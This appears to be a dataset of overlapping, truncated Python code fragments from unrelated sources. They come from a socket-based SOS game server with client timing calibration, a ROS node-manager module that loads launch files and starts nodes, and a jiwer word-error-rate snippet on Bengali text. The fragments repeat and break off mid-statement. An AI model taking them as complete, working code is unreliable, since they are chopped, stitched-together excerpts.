"in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]])",
"0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name):",
"+ uuid) self.both_players_received = True return else: return else: return time.sleep(0.2) with self.lock:",
"add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self):",
"= Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False",
"seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self,",
"= b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections = [None,",
"if self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference))",
"seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id]",
"if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the",
"= None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{}",
"str(number_1) + operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION",
"self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\":",
"= True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to",
"ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False",
"self.send_id(id) if self.game.players_names[1 - id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps,",
"if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start =",
"self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts = [None,",
"threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations",
"print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit =",
"character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\")",
"uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0",
"if self.game.players_names[1 - id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,),",
"Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks",
"[1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1,",
"i in range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y - (i",
"self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1",
"idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 -",
"== GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx,",
"+ uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0]",
"= self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) /",
"connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time()",
"<= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the question \" +",
"in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \", ping0 * 1000,",
"self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec",
"sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) /",
"y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1]",
"sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence +=",
"received the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def",
"2 for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for",
"+ self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn: conn.close() def calculate_score(self,",
"= self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in",
"/ 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1",
"= question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received",
"self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id,",
"player has received the question \" + uuid) self.both_players_received = True return else:",
"= [[{} for _ in range(10)], [{} for _ in range(10)]] self.ts_difference =",
"-1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1, coordinate_x",
"self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 delta1",
"# in seconds def __init__(self): self.active_connections = [None, None] self.game = Game(4, 4)",
"in range(10)]] self.ts_difference = 0 # Average difference between timestamps of player 0",
"self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn:",
"self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" + uuid) self.both_players_received = True",
"GameState.MOVE or self.game.turn != id: # or not self.both_players_received: return coordinate_x, coordinate_y, character",
"coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration:",
"not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if",
"for conn in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character):",
"self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference in seconds",
"return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both",
"information to the all players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION:",
"= [[-1, 0], [-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] =",
"= duration if self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2",
"0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock:",
"self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 =",
"daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator =",
"= character for x in range(coordinate_x - 1, coordinate_x + 2): for y",
"id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self):",
"sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence ==",
"2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated",
"print(\"Both player has received the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid)",
"0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts = [None, None] def",
"= ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"])",
"id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self):",
"self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in",
"idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2)",
"in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move): with self.lock:",
"for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def",
"time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in enumerate(self.active_connections):",
"message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player",
"id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id]",
"self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts",
"- 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or",
"sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 -",
"Game, GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE",
"self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received =",
"[{} for _ in range(10)]] self.ts_difference = 0 # Average difference between timestamps",
"1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts",
"== \"*\" else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question",
"def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1], [0,",
"+ coordinate[1]) def move(self, id, move): with self.lock: if self.game.state != GameState.MOVE or",
"\\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence",
"def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)})",
"< 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence =",
"conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1,",
"threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id)",
"= 0 # Average difference between timestamps of player 0 and 1. self.received_acks_cnt",
"1) * direction[0], y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0] <",
"0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >=",
"seconds def __init__(self): self.active_connections = [None, None] self.game = Game(4, 4) self.lock =",
"self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <=",
"Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn:",
"None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the Question: \" +",
"self.both_players_received = False self.calibration_acks = [[], []] self.calibrations = [[{} for _ in",
"= time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread,",
"self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec",
"= sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"])",
"with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id]",
"in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New",
"= [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if operator ==",
"delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 delta1 =",
"self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received",
"operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question =",
"self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) /",
"= 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id,",
"def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks",
"- self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time()",
"+= 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference()",
"+= 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def",
"range(10)]] self.ts_difference = 0 # Average difference between timestamps of player 0 and",
"- id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received",
"ping0 * 1000, \" ms\") print(\"Player 1 has a ping: \", ping1 *",
"for _ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt",
"+ self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in enumerate(self.active_connections): if conn:",
"self.ts_difference = delta0 - delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference)",
"!= uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received =",
"direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >=",
"for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c",
"timestamp difference between acknowledgment of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0]",
"self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1])",
"self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations",
"def add_connection(self, conn): id = 1 if self.active_connections[0] == None: id = 0",
"time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION:",
"\"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD)",
"delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts,",
"id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send",
"connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time()",
"return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state =",
"id def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board()",
"id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state",
"a ping: \", ping1 * 1000, \" ms\") self.ping_difference = ping0 - ping1",
"self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:]",
"import sys import random import uuid import time sys.path.append('..') from game import Game,",
"< self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn = id self.notify_players() #",
"-self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) /",
"duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or"
] |
[
"সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error = wer(ground_truth,",
"= \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\"",
"খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error =",
"from jiwer import wer ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis =",
"jiwer import wer ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার",
"\"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error",
"import wer ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে",
"দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error = wer(ground_truth, hypothesis)",
"wer ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা",
"পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে পরিচিত\" error = wer(ground_truth, hypothesis) error",
"ground_truth = \"কুমিল্লার খাদি সারা দেশে পরিচিত\" hypothesis = \"কুমিল্লার খাদে সারা দেশে"
] |
[
"node): result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max')",
"node to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p = self.roscfg.params[cap_param]",
"respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] =",
"= rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service",
"def runNode(self, node, autostart=False): ''' Start the node with given name from the",
"= descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter",
"C{dict(node name : [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr = ('',",
"or an empty string, if the C{file} is an absolute path @type package:",
"item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name))",
"False for f in afilter: if a.startswith(f): in_filter = True break if ':='",
"All rights reserved. # # Redistribution and use in source and binary forms,",
"parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple",
"the same name found in the package, the first one will be tacked.",
"= ns cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description =",
"% topic) topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except:",
"in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def",
"the parameter group parameter found, assign node to the group if not cap_ns:",
"launch file @type path: C{str} @param package: the package containing the launch file",
"@param node: the name of the node @type node: C{str} @raise StartException: if",
"capabilities description # use two separate loops, to create the description list first",
"roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not None and not item.machine_name",
"rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) > 1: raise StartException('Multiple executables are found! The",
"ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from",
"with self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if",
"system default coding to unicode. @param val: the string coding as system default",
"DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;",
"class StartException(Exception): ''' The exception throwing while run a node containing in the",
"LF (Line Feed) and decode the string entry from system default coding to",
"for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n",
"* Redistributions of source code must retain the above copyright # notice, this",
"str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ)",
"'ENV']: del new_env[k] except: pass # add node environment parameter for k, v",
"# with the distribution. # * Neither the name of Fraunhofer nor the",
"return result def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and C{capability_group}",
"'%s as': %s\", node, str(' '.join(popen_cmd))) # remove the 'BASH_ENV' and 'ENV' from",
"a new configuration. ''' self.listService = None '''@ivar: The service will be created",
"%s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv =",
"item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is",
"%d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg, filename): cmd = None try: cmd",
"# self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return [] def rosservice_description(self,",
"config') self.runService = None if self.listService is not None: self.listService.shutdown('reload config') self.listService =",
"# self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return []",
"ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid 'defunct' processes",
"for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove",
"depending on ROS distribution API. @return: ROS master URI @rtype: C{str} ''' try:",
"self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) !=",
"PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS",
"def rosservice_reload(self, req): self.load(2.) return [] # def rosservice_load_launch(self, req): # ''' #",
"return # env = n.env_args prefix = n.launch_prefix if n.launch_prefix is not None",
"rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import",
"string coding as system default @type val: str @return: the decoded string @rtype:",
"self.runService = None '''@ivar: The service will be created on each load of",
"description: C{dict(node name : [(sensor type, sensor name, sensor description), ...])}''' self.robot_descr =",
"will be tacked. @param path: the file name of the launch file @type",
"groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns = cap_ns #",
"OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR",
"= '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic",
"= subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid 'defunct' processes thread",
"% n.namespace, '__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd)",
"raise StartException(str(e)) # handle different result types str or array of string if",
"capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes':",
"new configuration. ''' self.description_response = ListDescriptionResponse() # variables to print the pending autostart",
"conditions and the following # disclaimer in the documentation and/or other materials provided",
"verbose=False, argv=argv) # create the list with node names for item in self.roscfg.nodes:",
"val.replace(\"\\\\n \", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self):",
"'' dr.robot_descr = '' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value,",
"from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required",
"a node containing in the loaded configuration. ''' pass class DefaultCfg(object): def __init__(self):",
"try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node,",
"this list of conditions and the following disclaimer. # * Redistributions in binary",
"= rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes)",
"'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart",
"determine the current working path, Default: the package of the node cwd =",
"p.key, p.value) r = param_server_multi() for code, msg, _ in r: if code",
"> 0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type',",
"load the launchfile info local namespace sys.argv = list(argv) # set the global",
"if a.startswith(f): in_filter = True break if ':=' not in a or in_filter:",
"unify clear params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r",
"self._pending_starts.remove(node) except: pass # print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts:",
"ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch",
"if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid",
"# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO,",
"cwd, env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd, cwd=cwd, env=env) #",
"argv): afilter = ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a in",
"n.env_args prefix = n.launch_prefix if n.launch_prefix is not None else '' args =",
"= (str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd is None or",
"import sys import threading from .screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception):",
"machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current working path,",
"# skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return #",
"LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND",
"import subprocess import sys import threading from .screen_handler import ScreenHandler # , ScreenHandlerException",
"config') self.listService = None self.nodes = [] # the name of nodes with",
"params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start the node",
"cap_ns # add new group in the namespace of the node if ns",
"[%s] not found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name =",
"one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False):",
"parameter into ROS parameter server. ''' params = dict() for param, value in",
"0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay =",
"the given package. If more then one launch file with the same name",
"USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY",
"self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return [] def rosservice_description(self, req):",
"the '\\\\n' by LF (Line Feed) and decode the string entry from system",
"the ROS_NAMESPACE environment is used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE']",
"above copyright # notice, this list of conditions and the following disclaimer. #",
